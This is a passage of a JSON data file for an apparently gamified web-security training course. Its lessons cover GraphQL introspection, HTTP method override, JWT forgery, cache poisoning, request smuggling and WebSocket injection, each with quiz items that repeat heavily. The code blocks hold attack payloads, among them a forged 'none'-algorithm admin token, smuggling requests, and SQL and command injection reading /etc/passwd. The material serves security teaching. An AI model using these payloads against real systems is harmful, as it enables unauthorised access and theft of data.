files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-graphql-introspection","cat":"Web Application","title":"GraphQL Introspection Exploitation","diff":2,"xp":150,"intro":"Dump the entire GraphQL schema with one query.","sections":[{"type":"text","content":"GraphQL introspection reveals: all types, fields, mutations, and subscriptions. This is the API's complete documentation, served to anyone who asks."},{"type":"code","lang":"bash","content":"# Introspection query\ncurl -X POST https://target.com/graphql -H 'Content-Type: application/json' \\\n  -d '{\"query\":\"{__schema{types{name fields{name type{name}}}}}\"}'| jq\n# Find mutations\ncurl -X POST https://target.com/graphql \\\n  -d '{\"query\":\"{__schema{mutationType{fields{name args{name type{name}}}}}}\"}'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"GraphQL introspection reveals...","opts":["Server config","The entire API schema (types, fields, mutations)","Database credentials","Source code"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-http-method-override","cat":"Web Application","title":"HTTP Method Override","diff":2,"xp":150,"intro":"Change the HTTP method via headers to bypass access controls.","sections":[{"type":"text","content":"Some frameworks support X-HTTP-Method-Override. If GET is allowed but DELETE isn't, send GET with X-HTTP-Method-Override: DELETE."},{"type":"code","lang":"bash","content":"# Method override via header\ncurl -X GET https://target.com/api/user/1 -H 'X-HTTP-Method-Override: DELETE'\ncurl -X POST https://target.com/api/admin -H 'X-HTTP-Method: PUT'\n# Also check: X-Method-Override, _method parameter\ncurl 'https://target.com/api/user/1?_method=DELETE'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"X-HTTP-Method-Override bypasses...","opts":["Encryption","Access controls that only check the real HTTP method","CSRF tokens","Rate limiting"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-jwt-none-algorithm","cat":"Web Application","title":"JWT Algorithm None Attack","diff":2,"xp":150,"intro":"Forge JWT tokens by changing the algorithm to 'none'.","sections":[{"type":"text","content":"If the server doesn't validate the algorithm field, change alg to 'none' and remove the signature. The server accepts the unsigned token."},{"type":"code","lang":"bash","content":"# Original JWT: header.payload.signature\n# 1. Decode header: {\"alg\":\"HS256\",\"typ\":\"JWT\"}\n# 2. Change to: {\"alg\":\"none\",\"typ\":\"JWT\"}\n# 3. Encode new header\n# 4. Remove signature (empty string after the last dot)\n# Result: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ."},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"JWT 'none' algorithm attack works when...","opts":["The secret is weak","The server doesn't validate the algorithm field","JWT is expired","The token is encrypted"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-jwt-key-confusion","cat":"Web Application","title":"JWT Key Confusion (RS256 to HS256)","diff":4,"xp":250,"intro":"Trick the server into using the public key as an HMAC secret.","sections":[{"type":"text","content":"If the server uses RS256 (asymmetric) but accepts HS256 (symmetric), sign the token with the public key. The server verifies with the same public key."},{"type":"code","lang":"bash","content":"# 1. Download the server's public key\ncurl https://target.com/.well-known/jwks.json\n# 2. Change header from RS256 to HS256\n# 3. Sign the token using the public key as HMAC secret\npython3 jwt_tool.py token -X k -pk public.pem\n# The server uses its public key to verify -> match!"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Key confusion works because...","opts":["HMAC is stronger","RS256 public key is used as HS256 secret for both signing and verifying","Keys are exchanged","The token expires"],"ans":1},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-web-cache-poisoning","cat":"Web Application","title":"Web Cache Poisoning Detailed","diff":4,"xp":250,"intro":"Poison shared caches to serve malicious content to all users.","sections":[{"type":"text","content":"Inject unkeyed inputs (headers like X-Forwarded-Host) that affect the response but aren't in the cache key. The poisoned response is served to everyone."},{"type":"code","lang":"bash","content":"# Test for cache poisoning\ncurl -H 'X-Forwarded-Host: evil.com' https://target.com/\n# If the response includes evil.com AND is cached:\n# Every user gets the poisoned response\n# Also test: X-Forwarded-Scheme, X-Original-URL\n# Detection: check Age header, Vary header"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Cache poisoning requires finding...","opts":["SQL injection","Headers that affect the response but aren't in the cache key","Open ports","Weak passwords"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-request-smuggling-clte","cat":"Web Application","title":"CL.TE Request Smuggling","diff":4,"xp":250,"intro":"Front-end uses Content-Length, back-end uses Transfer-Encoding.","sections":[{"type":"text","content":"When the front-end proxy reads Content-Length and the back-end reads Transfer-Encoding, the front-end sees one request while the back-end sees two."},{"type":"code","lang":"http","content":"POST / HTTP/1.1\nHost: target.com\nContent-Length: 13\nTransfer-Encoding: chunked\n\n0\n\nSMUGGLED"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CL.TE smuggling means...","opts":["Both use CL","Front-end uses Content-Length, back-end uses Transfer-Encoding","Both use TE","The server crashes"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-request-smuggling-tecl","cat":"Web Application","title":"TE.CL Request Smuggling","diff":4,"xp":250,"intro":"Front-end uses Transfer-Encoding, back-end uses Content-Length.","sections":[{"type":"text","content":"The reverse of CL.TE: the front-end processes chunked encoding while the back-end reads Content-Length. The smuggled request hides in the chunked body."},{"type":"code","lang":"http","content":"POST / HTTP/1.1\nHost: target.com\nContent-Length: 3\nTransfer-Encoding: chunked\n\n7\nSMUGGLE\n0\n\n"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"TE.CL means the front-end reads...","opts":["Content-Length","Transfer-Encoding first, back-end reads Content-Length","Both the same","Neither"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-websocket-injection","cat":"Web Application","title":"WebSocket Message Injection","diff":3,"xp":200,"intro":"Inject malicious data through WebSocket connections.","sections":[{"type":"text","content":"If WebSocket messages contain user input that's processed server-side without sanitization, inject SQL, commands, or XSS payloads through the WebSocket."},{"type":"code","lang":"javascript","content":"// Connect to WebSocket\nvar ws = new WebSocket('wss://target.com/ws');\nws.onopen = function() {\n  // SQL injection through WebSocket message\n  ws.send(JSON.stringify({query: \"' OR 1=1--\"}));\n  // Command injection\n  ws.send(JSON.stringify({cmd: \"; cat /etc/passwd\"}));\n};"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WebSocket messages are often...","opts":["Always sanitized","Not sanitized server-side (same injection risks as HTTP)","Encrypted end-to-end","Blocked by 